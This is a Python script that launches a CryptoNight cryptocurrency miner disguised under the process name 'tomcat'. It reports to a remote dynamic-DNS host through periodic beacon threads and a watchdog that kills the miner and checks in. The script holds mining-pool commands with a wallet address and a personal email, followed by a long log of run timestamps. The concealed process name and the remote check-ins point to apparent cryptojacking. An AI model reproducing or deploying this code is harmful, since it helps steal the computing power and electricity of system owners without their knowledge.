import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:59:01.747703
#2018-02-17 16:46:06.590513
#2018-02-17 18:34:03.567426
#2018-02-17 20:21:07.102301
#2018-02-17 22:08:06.666337
#2018-02-17 23:51:07.039044
#2018-02-18 01:42:01.510685
#2018-02-18 03:28:06.310585
#2018-02-18 05:16:08.151300
#2018-02-18 07:10:05.380163
#2018-02-18 08:58:01.966527
#2018-02-18 10:44:06.972427
#2018-02-18 12:32:02.192277
#2018-02-18 14:19:04.102523
#2018-02-18 16:10:05.583845
#2018-02-18 17:58:02.004912
#2018-02-18 19:45:06.469100
#2018-02-18 21:32:04.511329
#2018-02-18 23:21:03.651247
#2018-02-19 01:08:04.442726
#2018-02-19 02:53:07.223526
#2018-02-19 04:42:01.773138
#2018-02-19 06:26:03.791712
#2018-02-19 08:16:07.365544
#2018-02-19 10:04:07.783746
#2018-02-19 11:53:05.356372
#2018-02-19 13:40:01.518825
#2018-02-19 15:28:03.704564
#2018-02-19 17:15:05.549747
#2018-02-19 19:03:06.783993
#2018-02-19 20:49:06.553117
#2018-02-19 22:36:07.006064
#2018-02-20 00:22:03.946154
#2018-02-20 02:09:04.309858
#2018-02-20 03:58:08.449265
#2018-02-20 05:42:06.553680
#2018-02-20 07:28:06.082249
#2018-02-20 09:12:04.292537
#2018-02-20 10:55:05.027722
#2018-02-20 12:43:02.079827
#2018-02-20 14:27:05.908408
#2018-02-20 16:12:09.095077
#2018-02-20 17:58:10.999268
#2018-02-20 19:49:07.807805
#2018-02-20 21:38:07.237923
#2018-02-20 23:19:01.372270
#2018-02-21 01:02:06.959943
#2018-02-21 02:49:06.324827
#2018-02-21 04:38:01.432043
#2018-02-21 06:26:01.976641
#2018-02-21 08:11:03.607626
#2018-02-21 09:58:04.404457
#2018-02-21 11:45:12.649291
#2018-02-21 13:34:03.736908
#2018-02-21 15:19:05.947444
#2018-02-21 17:10:06.673250
#2018-02-21 18:58:01.298040
#2018-02-21 20:38:01.916832
#2018-02-21 22:23:05.165057
#2018-02-22 00:13:07.311808
#2018-02-22 02:02:03.678206
#2018-02-22 03:48:05.103628
#2018-02-22 05:34:05.703286
#2018-02-22 07:19:04.222227
#2018-02-22 09:06:06.384492
#2018-02-22 10:54:01.658385
#2018-02-22 12:39:06.863547
#2018-02-22 14:23:07.851046
#2018-02-22 16:12:10.799155
#2018-02-22 17:59:10.598899
#2018-02-22 19:48:05.999915
#2018-02-22 21:37:07.140512
#2018-02-22 23:24:01.702824
#2018-02-23 01:10:07.003465
#2018-02-23 02:57:06.090551
#2018-02-23 04:42:07.443628
#2018-02-23 06:29:02.107216
#2018-02-23 08:16:07.204515
#2018-02-23 10:33:01.312328
#2018-02-23 12:24:08.736410
#2018-02-23 14:13:09.719232
#2018-02-23 16:05:13.411297
#2018-02-23 17:51:03.975018
#2018-02-23 19:37:07.641626
#2018-02-23 21:20:07.446921
#2018-02-23 23:09:06.722437
#2018-02-24 00:54:06.607801
#2018-02-24 02:49:05.131090
#2018-02-24 04:39:01.695966
#2018-02-24 06:22:07.367652
#2018-02-24 08:10:04.888688
#2018-02-24 09:53:07.683679
#2018-02-24 11:48:01.479420
#2018-02-24 13:39:07.346014
#2018-02-24 15:27:06.509809
#2018-02-24 17:17:07.944330
#2018-02-24 19:08:01.500878
#2018-02-24 20:56:01.834336
#2018-02-24 23:22:05.740795
#2018-02-25 02:47:01.412731
#2018-02-25 06:28:05.094029